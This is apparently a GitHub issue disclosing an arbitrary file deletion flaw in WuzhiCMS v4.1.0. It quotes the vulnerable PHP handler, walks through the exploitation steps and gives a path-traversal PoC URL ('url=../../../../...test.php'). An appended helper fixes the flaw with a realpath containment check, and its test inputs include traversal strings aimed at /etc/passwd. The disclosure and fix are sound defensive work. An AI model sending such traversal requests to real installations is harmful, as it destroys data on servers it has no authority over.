wuzhicms v4.1.0: arbitrary file deletion vulnerability in the background #191

Open
purple-WL opened this issue Aug 25, 2020 · 0 comments

purple-WL commented Aug 25, 2020

An arbitrary file deletion vulnerability was found in WuzhiCMS V4.1.0, which allows an attacker to delete any file. The exploit conditions are a background login and directory overflow.
Vulnerable file: `coreframe\app\attachment\admin\index.php`

```php
/**
 * Delete file
 *
 * @author tuzwu
 * @createtime
 * @modifytime
 * @param
 * @return
 */
public function del()
{
    $id  = isset($GLOBALS['id']) ? $GLOBALS['id'] : '';
    // remove_xss() strips markup only; it does not normalise or validate the path.
    $url = isset($GLOBALS['url']) ? remove_xss($GLOBALS['url']) : '';
    if (!$id && !$url) MSG(L('operation_failure'), HTTP_REFERER, 3000);
    if ($id) {
        if (!is_array($id)) {
            $ids = array($id);
        } else {
            $ids = $id;
        }

        foreach ($ids as $id) {
            $where = array('id' => $id);
            $att_info = $this->db->get_one('attachment', $where, 'usertimes,path');
            if ($att_info['usertimes'] > 1) {
                $this->db->update('attachment', 'usertimes = usertimes-1', $where);
            } else {
                $this->my_unlink(ATTACHMENT_ROOT . $att_info['path']);
                $this->db->delete('attachment', $where);
                $this->db->delete('attachment_tag_index', array('att_id' => $id));
            }
        }
        MSG(L('delete success'), HTTP_REFERER, 1000);
    } else {
        if (!$url) MSG('url del ' . L('operation_failure'), HTTP_REFERER, 3000);
        // Only the ATTACHMENT_URL prefix is stripped; "../" sequences survive.
        $path = str_ireplace(ATTACHMENT_URL, '', $url);
        if ($path) {
            $where = array('path' => $path);
            $att_info = $this->db->get_one('attachment', $where, 'usertimes,id');

            if (empty($att_info)) {
                // No database row for this path: the file is unlinked relative to
                // ATTACHMENT_ROOT with no check that it stays inside that directory.
                $this->my_unlink(ATTACHMENT_ROOT . $path);
                MSG(L('operation_success'), HTTP_REFERER, 3000);
            }

            if ($att_info['usertimes'] > 1) {
                $this->db->update('attachment', 'usertimes = usertimes-1', array('id' => $att_info['id']));
            } else {
                $this->my_unlink(ATTACHMENT_ROOT . $path);
                $this->db->delete('attachment', array('id' => $att_info['id']));
                MSG(L('operation_success'), HTTP_REFERER, 3000);
            }
        } else {
            MSG(L('operation_failure'), HTTP_REFERER, 3000);
        }
    }
}
```

Exploitation of the vulnerability:

1. Enter the directory mode of the extension module.
   [screenshot: 微信截图_20200825103337]
2. In directory mode, click "return to the previous directory".
   [screenshot: 微信截图_20200825103555]
3. By capturing packets, discover the parameter `dir=.`; change it to `dir=..`.
   [screenshot: 微信截图_20200825103747]
   After the directory overflow, more delete options are shown than before.
   [screenshot: 微信截图_20200825104046]
4. As a test, remove robots.txt: click "delete" next to robots.txt.
   [screenshot: 微信截图_20200825104729]
   Deleted successfully!
   [screenshot: 微信截图_20200825104939]
5. In the request we discover the parameter `url=../robots.txt`; let's try changing the path to something else.
   [screenshot: 微信截图_20200825105026]
6. A new test.php file was created on disk for the test.
   [screenshot: 微信截图_20200825105331]
7. Change the parameter to `url=../../../../../../../../test.php`.
   [screenshot: 微信截图_20200825105640]
   Deleted successfully! test.php can no longer be found.
   [screenshot: 微信截图_20200825105554]

The PoC is as follows (the path and parameters depend on the actual deployment):

```
http://example.com/index.php?v=del&url=../../../../../../../../test.php&m=attachment&f=index&_su=wuzhicms&_menuid=29&_submenuid=52
```
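The root cause in `del()` is that `ATTACHMENT_ROOT . $path` is passed to `my_unlink()` without any check that the resolved path still lies inside the attachment directory. The block below is an added example of such a containment check, written for this page; it is not code from the issue or from wuzhicms. The function name `safe_attachment_path()`, the `demo()` fixture and its temporary directories are assumptions for illustration, and `ATTACHMENT_ROOT` is assumed to be an absolute directory path as the concatenation in the original code suggests.

```php
<?php
/**
 * Resolve a user-supplied attachment path and return the absolute path only if it
 * stays inside $root. Returns null for traversal ("../"), absolute paths, null bytes,
 * symlinks that resolve outside the root, and files that do not exist.
 * (Hypothetical helper; not part of wuzhicms.)
 */
function safe_attachment_path(string $root, string $relative): ?string
{
    $rootReal = realpath($root);
    if ($rootReal === false) {
        return null;                                   // root itself is missing
    }
    if ($relative === '' || strpos($relative, "\0") !== false
        || $relative[0] === '/' || $relative[0] === '\\') {
        return null;                                   // empty, null byte, or absolute
    }
    // realpath() collapses "." and ".." and follows symlinks, so the check below
    // is made on the final on-disk location, not on the string the user sent.
    $candidate = realpath($rootReal . DIRECTORY_SEPARATOR . $relative);
    if ($candidate === false) {
        return null;                                   // nothing to delete
    }
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;                                   // escaped the attachment root
    }
    return $candidate;
}

/** Constructed fixture: one legitimate upload inside the root, one file just outside it. */
function demo(): array
{
    $base = sys_get_temp_dir() . '/wz_' . bin2hex(random_bytes(4));
    $root = $base . '/attachment';
    mkdir($root . '/2020', 0700, true);
    file_put_contents($root . '/2020/a.png', 'x');     // constructed upload
    file_put_contents($base . '/outside.txt', 'y');    // constructed file outside the root

    $inputs = [
        '2020/a.png',                                  // normal deletion request
        '2020/../2020/a.png',                          // contains ".." but stays inside
        '../outside.txt',                              // exists, but escapes the root
        '../../../../../../../../etc/passwd',          // traversal pattern from the issue
        '/etc/passwd',                                 // absolute path
        "2020/a.png\0.txt",                            // null byte
    ];
    $results = [];
    foreach ($inputs as $in) {
        $results[$in] = safe_attachment_path($root, $in) !== null ? 'allowed' : 'rejected';
    }

    // Clean up the fixture.
    unlink($root . '/2020/a.png');
    rmdir($root . '/2020');
    rmdir($root);
    unlink($base . '/outside.txt');
    rmdir($base);
    return $results;
}

foreach (demo() as $input => $verdict) {
    printf("%-40s %s\n", addcslashes($input, "\0"), $verdict);
}
```

In the handler, both `my_unlink(ATTACHMENT_ROOT . $path)` calls would be guarded by a non-null result from this check before anything is unlinked, and the directory-listing endpoint that accepts `dir=..` needs the same containment test on the directory it lists, since that listing is what exposes the delete links in the first place. The `id` branch is only as safe as the `path` column stored at upload time, so the same normalisation belongs in the upload path as well.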
